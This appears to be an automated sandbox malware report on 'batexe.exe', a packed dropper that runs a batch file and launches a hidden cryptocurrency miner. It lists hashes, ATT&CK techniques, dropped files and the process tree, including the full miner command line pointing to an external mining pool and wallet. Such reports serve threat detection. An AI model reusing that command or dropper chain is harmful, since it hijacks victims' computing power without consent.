73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
299s
platform
windows10-2004_x64
resource
win10v2004-20231222-ja
resource tags

arch:x64arch:x86image:win10v2004-20231222-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
12/02/2024, 03:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
2940	b2e.exe
1664	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1664	cpuminer-sse2.exe
1664	cpuminer-sse2.exe
1664	cpuminer-sse2.exe
1664	cpuminer-sse2.exe
1664	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1232-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1232 wrote to memory of 2940	1232	batexe.exe	83
PID 1232 wrote to memory of 2940	1232	batexe.exe	83
PID 1232 wrote to memory of 2940	1232	batexe.exe	83
PID 2940 wrote to memory of 1572	2940	b2e.exe	86
PID 2940 wrote to memory of 1572	2940	b2e.exe	86
PID 2940 wrote to memory of 1572	2940	b2e.exe	86
PID 1572 wrote to memory of 1664	1572	cmd.exe	87
PID 1572 wrote to memory of 1664	1572	cmd.exe	87

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1232
- C:\Users\Admin\AppData\Local\Temp\6B6C.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\6B6C.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6B6C.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6D50.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1572
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1664

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6B6C.tmp\b2e.exe

Filesize
1.7MB

MD5
71f1b080abe838ec381df366a6f8213a

SHA1
e0176939e4ea56ce737c36c8804e4c0cc4903078

SHA256
e26a2e22848489eea451c3972b986b506f960a10f0cab0becc7834f84db8a8fb

SHA512
15f8abe3a107dd6e487b490ee3558710cf2ddf869291cd6f09641a430f5d288e7ddc0f610e9e0616e4f8c317fef310b9557d877ce24f4a45c3c97be22ea938db

Download Submit
C:\Users\Admin\AppData\Local\Temp\6B6C.tmp\b2e.exe

Filesize
1.2MB

MD5
5731f334d995d94467960ae35223d3b3

SHA1
d31403751339705b966e05744fb91bff884a2bac

SHA256
91684a51710bdc6332e6c1ca4d4473cda8a435ef0130510ecb64b83bcec55c44

SHA512
2b0dc22405d5f76e396c6ec5fd7402cc7cbd6efaa512e561d8a20b64f8d9b467fadd9256fd2478ecbe2197d5ad869d94eccbf6ee2c3352800650bfb753c27604

Download Submit
C:\Users\Admin\AppData\Local\Temp\6B6C.tmp\b2e.exe

Filesize
924KB

MD5
b609b0b6e7fb82133fcdbe371b041256

SHA1
acfeb5f26636613bbc489dd581b59f271e559ab9

SHA256
87f197b0efc03ea67c099249c081865628384d49fed4c5163d47bb22a547b7e9

SHA512
e049e685342ceafef16598e50b294ae13d8a0e22d7ab9f23787e9d0482b3f13e628665f402f5a2fc32bd684eb561874b7b4b85a4cf444fded19b0ffd9b3bb3f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\6D50.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
280KB

MD5
c1914224e3bba389a407b4717c3e19b4

SHA1
a6088cc7038c3c4118e250e423a6e78138af1d4a

SHA256
6e887afa3428fc268769c98baa0e83b1e60689e40e6d1ecf00b73bc4363ba779

SHA512
0106cd6d9878739ff1ae75fcf51e05a0eef1c65482b24f665a3e65bf2fd624bd698d0e8a0a4425e9ad39b34b8a6638eb27ce80c1ebf7e763ec36519163aa07c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
489KB

MD5
736bfe1891ac62242d1cb6c3e90fe4a1

SHA1
90fe03544e13f1071518f743fead811b74e88bad

SHA256
ca04775e4a66a5a8dfc93bf4f5ed078891c05547f25834e8ee32c6117905215e

SHA512
ff38e896e7f0544f853e1e60f1f48893ed1ad2d6f553e0f43bf082267f926dd1d00f6bf7d679dcf9902d157fd2803cc3ac8d269c9490cc7bae01097e13a213d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
203KB

MD5
6420e88b30f98fd443b2623598cbf51a

SHA1
eb2c9584ede9ae4267e4dff5f003634eb1cb3947

SHA256
c8ed046ac55a2f9443b804706c6c71223f5201e483e4378b50e5ed3916ed9dce

SHA512
139e31288a8ba534ae18c98d3902b29127b40d8e267ee6985739f85990e7ce74fdaafbda24fee2bb5a5beb6c5d20ef6d184c1da37686035a5cf06188c7b8252f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
114KB

MD5
2f5828c343c1fc7ea415d5cfcaf41f7a

SHA1
f11e27baaec1702faa637e2f08f60cb5d09a7e39

SHA256
e634c2209f07b16a26585ca6d5fe34063845b3495aeb92278e002c0279fa4fb3

SHA512
b88efb75a8108a207df206876a29e0f269a73b44802241b36e06ab6bfe89c4bfa0307851c8d97da450ec88e6e053ecc220f14bf7fc66af91ec7e9447a7bf13d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
66KB

MD5
c07b0e84e53e3ec83a0bd6f9b310f051

SHA1
eddc9267263326bd5b528e9d56a22aa3208844c6

SHA256
6121cbb2e53a9a8d14683f35bbb0bc30951ee6361f0fb8c90cb1642a057d1518

SHA512
692700ef2f9a5acf3226c061735256184ba26c086c3343bddb187932697cdc158d15d721978a36b89a5245b3e2afc68b3a55b1d23cf5b5f39067e7ef47700acb

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
142KB

MD5
0645e5b49d4efacb88eb35941d5362ca

SHA1
42f7d5ef34a4689ade4bd544b47c8cc26557bfd7

SHA256
307c6458d6c39b4af3705b175000535a55b373d2a91c3b967a6ca27897d98bf4

SHA512
98625e9bcf620d427d856739b6a464ea7e4a4cbb05eed4c9ed8018465bf8479a202e750d58db2d5847f4b6d0aa78db56d070adba9195fc866d1430135be9bf91

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
271KB

MD5
57503d9a818984c39ba1038a460894e1

SHA1
2bcd0ad91d9d9385a044ba480fb27db952f59544

SHA256
b4093712812e41e55d8fd3076b1eed90251d307a60270a247603483b9e0cb17c

SHA512
ca0da043c4797edbe55df6ccf0be4cb4acf9850af1ba1074c410d46d45e03731e0d335dc3dca8ac5e44801bab3a9d51538a0b44ad08e67d48ef830935bfe7ceb

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
128KB

MD5
3a673dce5222ad8ed1d3782407f10a2d

SHA1
1e6529df8c3847554d50e966b2bfd43d074c601c

SHA256
3477296e9d1769a1503b1f0bb04f0217910c089eddf1af56e54f3835ff63c403

SHA512
2026a8d56ea6716867bf1df8d95d99651351ea09cb7c64aa2b9967201aa63d43e26322c92be7429f44965c5c79fb94ef41d28f7f17b9968c2d7b6ac932917cdc

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
299KB

MD5
851fd52bbf42f90a74e25209be7c8ee3

SHA1
293b818ce77a6aaba96d981a296d09607ebed90e

SHA256
ba3057b4bac483cd118d865da9496caece1ba29ba557a2ab7153310a0bbd6ebe

SHA512
f6d30647eb9e4318e40058d2bb4b12cbaecd5ffd550a30e2f53be19224ca5bd59f2378e1b670a3c46c698df637bf017439219c8e536c52b0c8ec53a189e811d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
411KB

MD5
197724d3387f73d470264cccedcad486

SHA1
d84a3555f9a4a0e51d6da228772117da8c0c71e1

SHA256
6a37889f56ddd6575541ca7b226bce5de3000c759b5d16c06b288fa6a7e33672

SHA512
b57f3c27868da643b5c265368a4b9ef45458b7fd55cfe334c13b227dac9a34c6f6573de7cccf0bc188ea78739a71f659e08d915c093d03b5426fdad1322f951b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
267KB

MD5
18a412af49c0192e7cb141b058440232

SHA1
8bfad3bddfbd924012a68d393b06fb8e581a2aba

SHA256
e040550950ef5abc320830bb99ffc2d756d596a170200a22a61f246af1105c8e

SHA512
c014ab06a3f5a73a6a0e80637d8aa4a53637fbd1789e2c0255d5f47906192a8e207eff99c2a79ce6c38b2add72b5173c9377dff4311e409bb349bd6cc4eabb71

Download Submit
memory/1232-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/1664-47-0x0000000001150000-0x0000000002A05000-memory.dmp

Filesize
24.7MB

Download
memory/1664-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1664-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1664-46-0x00000000691A0000-0x0000000069238000-memory.dmp

Filesize
608KB

Download
memory/1664-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1664-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1664-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1664-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1664-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1664-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1664-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1664-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2940-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2940-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download